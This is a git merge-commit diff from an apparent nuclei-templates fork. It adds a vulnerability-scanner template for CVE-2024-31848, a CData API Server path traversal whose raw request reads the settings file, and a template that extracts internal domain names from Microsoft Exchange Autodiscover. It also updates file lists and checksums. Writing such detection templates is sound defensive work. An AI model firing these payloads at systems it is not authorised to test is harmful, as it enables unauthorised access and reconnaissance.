Merge branch 'projectdiscovery:main' into main
idealphase
GitHub
commit
9273fcd0dd
|
|
@ -33,6 +33,7 @@ on:
|
|||
- 'http/cves/2024/CVE-2024-2876.yaml'
|
||||
- 'http/cves/2024/CVE-2024-3136.yaml'
|
||||
- 'http/cves/2024/CVE-2024-31621.yaml'
|
||||
- 'http/cves/2024/CVE-2024-31848.yaml'
|
||||
- 'http/cves/2024/CVE-2024-31849.yaml'
|
||||
- 'http/cves/2024/CVE-2024-31850.yaml'
|
||||
- 'http/cves/2024/CVE-2024-31851.yaml'
|
||||
|
|
@ -57,8 +58,10 @@ on:
|
|||
- 'http/exposed-panels/tixeo-panel.yaml'
|
||||
- 'http/misconfiguration/installer/eyoucms-installer.yaml'
|
||||
- 'http/misconfiguration/installer/sabnzbd-installer.yaml'
|
||||
- 'http/misconfiguration/microsoft/ms-exchange-local-domain.yaml'
|
||||
- 'http/misconfiguration/titannit-web-exposure.yaml'
|
||||
- 'http/takeovers/squadcast-takeover.yaml'
|
||||
- 'http/vulnerabilities/citrix/citrix-oob-memory-read.yaml'
|
||||
- 'http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml'
|
||||
- 'http/vulnerabilities/titan/titannit-web-rce.yaml'
|
||||
- 'http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml'
|
||||
|
|
|
|||
|
|
@ -1,7 +1,8 @@
|
|||
name: ✨ WordPress Plugins - Update
|
||||
|
||||
on:
|
||||
workflow_dispatch:
|
||||
schedule:
|
||||
- cron: "0 0 * * *"
|
||||
|
||||
jobs:
|
||||
Update:
|
||||
|
|
|
|||
|
|
@ -28,6 +28,7 @@ http/cves/2024/CVE-2024-27956.yaml
|
|||
http/cves/2024/CVE-2024-2876.yaml
|
||||
http/cves/2024/CVE-2024-3136.yaml
|
||||
http/cves/2024/CVE-2024-31621.yaml
|
||||
http/cves/2024/CVE-2024-31848.yaml
|
||||
http/cves/2024/CVE-2024-31849.yaml
|
||||
http/cves/2024/CVE-2024-31850.yaml
|
||||
http/cves/2024/CVE-2024-31851.yaml
|
||||
|
|
@ -52,8 +53,10 @@ http/exposed-panels/teamforge-panel.yaml
|
|||
http/exposed-panels/tixeo-panel.yaml
|
||||
http/misconfiguration/installer/eyoucms-installer.yaml
|
||||
http/misconfiguration/installer/sabnzbd-installer.yaml
|
||||
http/misconfiguration/microsoft/ms-exchange-local-domain.yaml
|
||||
http/misconfiguration/titannit-web-exposure.yaml
|
||||
http/takeovers/squadcast-takeover.yaml
|
||||
http/vulnerabilities/citrix/citrix-oob-memory-read.yaml
|
||||
http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml
|
||||
http/vulnerabilities/titan/titannit-web-rce.yaml
|
||||
http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml
|
||||
|
|
|
|||
|
|
@ -0,0 +1,64 @@
|
|||
id: CVE-2024-31848
|
||||
|
||||
info:
|
||||
name: CData API Server < 23.4.8844 - Path Traversal
|
||||
author: pussycat0x
|
||||
severity: critical
|
||||
description: |
|
||||
A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31848
|
||||
- https://github.com/Stuub/CVE-2024-31848-PoC/blob/main/CVE-2024-31848.py
|
||||
- https://www.tenable.com/cve/CVE-2024-31848
|
||||
- https://www.tenable.com/security/research/tra-2024-09
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2024-31848
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00044
|
||||
epss-percentile: 0.09773
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"CData - API Server"
|
||||
tags: cve,cve2024,cdata,lfi
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login.rst'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
internal: true
|
||||
words:
|
||||
- '<title>CData - API Server</title>'
|
||||
|
||||
- raw:
|
||||
- |
|
||||
GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: {{RootURL}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"items":[{'
|
||||
- ':"true"'
|
||||
- 'notifyemail'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a0046304402207716de1b37106fd74b61c49cce61a5d2f0c123e701fc9e66b91a52b18a37ea2a02200cd509769de5850cafe5c0d9c721ec1c13740712ac9e7a26abe2917eddf7b9e9:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
id: hikivision-env
|
||||
id: hikvision-env
|
||||
|
||||
info:
|
||||
name: Hikvision Springboot Env Actuator - Detect
|
||||
|
|
@ -13,7 +13,7 @@ info:
|
|||
verified: true
|
||||
max-request: 5
|
||||
shodan-query: app="HIKVISION-综合安防管理平台"
|
||||
tags: misconfig,hikivision,springboot,env
|
||||
tags: misconfig,hikvision,springboot,env
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
|
|
@ -55,5 +55,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4b0a00483046022100effc47a075247114653ad921736cba15ecffd8c87f57d94f8ccaa224c6e36c5b022100cf025d5269ad1da196c4185a7d7632c6b4870893ac9484de57051d13d7d67ece:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100aba57f3fff77e8ea0837aba48a8e2518bfb62ce4052205ef76e703e275a8a68a0220198be2a746ade95cc4e1efb7231a6b97e68fc103a45c7b13f20299e01e18f9f7:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,45 @@
|
|||
id: ms-exchange-local-domain
|
||||
|
||||
info:
|
||||
name: Microsoft Exchange Autodiscover - Local Domain Exposure
|
||||
author: userdehghani
|
||||
severity: low
|
||||
description: |
|
||||
Microsoft Exchange is prone to a local domain exposure using the Autodiscover v2 endpoint.
|
||||
impact: |
|
||||
An attacker can leverage this information for reconnaissance and targeted attacks.
|
||||
remediation: |
|
||||
Restrict access to the Autodiscover service or configure it to not expose local domain information.
|
||||
reference:
|
||||
- https://support.microsoft.com/en-gb/topic/autodiscover-v2-returns-internalurl-not-externalurls-in-other-site-774301e2-2d1e-d5e0-aa41-a49f6e9b06f4
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: http.title:outlook exchange
|
||||
tags: misconfig, microsoft,ms-exchange,ad,dc
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/autodiscover/autodiscover.json?Protocol=ActiveSync&Email=user@domain.tld&RedirectCount=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- "(?i)(X-Calculatedbetarget:)"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 302
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
- x_calculatedbetarget
|
||||
# digest: 490a0046304402205f025e53bc125c91f858165a0912ddc8edd46b6b2370f2ef02cad79aa821edb002200f38bd6dc2bf6d5add1b15173de97999b01080b7297cc21eeee3206f3aed7a2d:922c64590222798bb761d5b6d8e72950
|
||||
File diff suppressed because one or more lines are too long
|
|
@ -3223,7 +3223,7 @@ http/cves/2023/CVE-2023-6875.yaml:2e8817b2133461b7fdb1b0d59f4c197202c3bd60
|
|||
http/cves/2023/CVE-2023-6895.yaml:9f63f7d60c0a07f24f11688a0021a925aafa4c26
|
||||
http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f
|
||||
http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158
|
||||
http/cves/2023/CVE-2023-6989.yaml:d00f0a2249e0bde6f0803f5bb7884544e5cadfd4
|
||||
http/cves/2023/CVE-2023-6989.yaml:c3d929a1f1abf5fa521c9d3ea494ca2646d12c14
|
||||
http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac
|
||||
http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49
|
||||
http/cves/2024/CVE-2024-0235.yaml:14f7242039b69741ffd3e1585a856862479d1ffe
|
||||
|
|
@ -3274,15 +3274,16 @@ http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a
|
|||
http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc
|
||||
http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d
|
||||
http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730
|
||||
http/cves/2024/CVE-2024-31848.yaml:9af993dd7348e9e7863df89ef4f77c8458ad6147
|
||||
http/cves/2024/CVE-2024-31849.yaml:38ee32ca8fe1a5378feb218852477eb6460e62ea
|
||||
http/cves/2024/CVE-2024-31850.yaml:e6fdbf6bb6829c0afd6fa7027b68b859f301d1ba
|
||||
http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf
|
||||
http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6
|
||||
http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921
|
||||
http/cves/2024/CVE-2024-32651.yaml:923d99a00afdb05df7e401f31ce5950112b31890
|
||||
http/cves/2024/CVE-2024-32651.yaml:644d79d1e5be106386851b644d904c48a003d4b5
|
||||
http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17
|
||||
http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b
|
||||
http/cves/2024/CVE-2024-33724.yaml:cb12817b487797686ea48ef42ff6735b28d3c2a6
|
||||
http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0
|
||||
http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c
|
||||
http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82
|
||||
http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b
|
||||
|
|
@ -5496,6 +5497,7 @@ http/misconfiguration/linktap-gateway-exposure.yaml:8445d5ca649bd0696ca61bb561b3
|
|||
http/misconfiguration/locust-exposure.yaml:a05194cd9aa186052bbae31223d52c0ea9ab3b68
|
||||
http/misconfiguration/lvm-exporter-metrics.yaml:f1cdf9f009abc6debe3fc3c58740d68b00322c64
|
||||
http/misconfiguration/manage-engine-ad-search.yaml:e58d8b0d6b16f99046807fb55b73df8dc558bd2d
|
||||
http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:017a97227ca466c4831450986e59a3c99ea1f781
|
||||
http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac3db72af84f34e3
|
||||
http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d
|
||||
http/misconfiguration/misconfigured-docker.yaml:ca18899f575d3f7df82e3a33e2a9b4b0f75582ef
|
||||
|
|
@ -7446,6 +7448,7 @@ http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml:603bb5279bc4d
|
|||
http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml:ea1ab53653cf1c170515c6ee5e6867b76f167b01
|
||||
http/vulnerabilities/cisco/cisco-webex-log4j-rce.yaml:aef89b607f0527340246a54d607fb5a0c4533d5e
|
||||
http/vulnerabilities/cisco/cucm-username-enumeration.yaml:8f1f34c21c46c88b1faf80e11363097dc18d7c03
|
||||
http/vulnerabilities/citrix/citrix-oob-memory-read.yaml:b31d091364cfce9c3384b7db96cf236992d044f4
|
||||
http/vulnerabilities/code42/code42-log4j-rce.yaml:c6eca1ad5491f3ab51671acd9067242f3f77767e
|
||||
http/vulnerabilities/concrete/concrete-xss.yaml:85b12fb54e5f98736f4bc70df764384fe675f2f2
|
||||
http/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml:305c4b65dec3bc65e31fcd5c0b72a9841e630064
|
||||
|
|
@ -8495,7 +8498,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
|
|||
ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
|
||||
ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
|
||||
ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
|
||||
templates-checksum.txt:6daf0c128d534a3887b61c77158735f327eb914e
|
||||
templates-checksum.txt:435e6048b63deb8509219645aafa7043cc65537c
|
||||
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
|
||||
workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
|
||||
workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4
|
||||
|
|
|
|||
Loading…
Reference in New Issue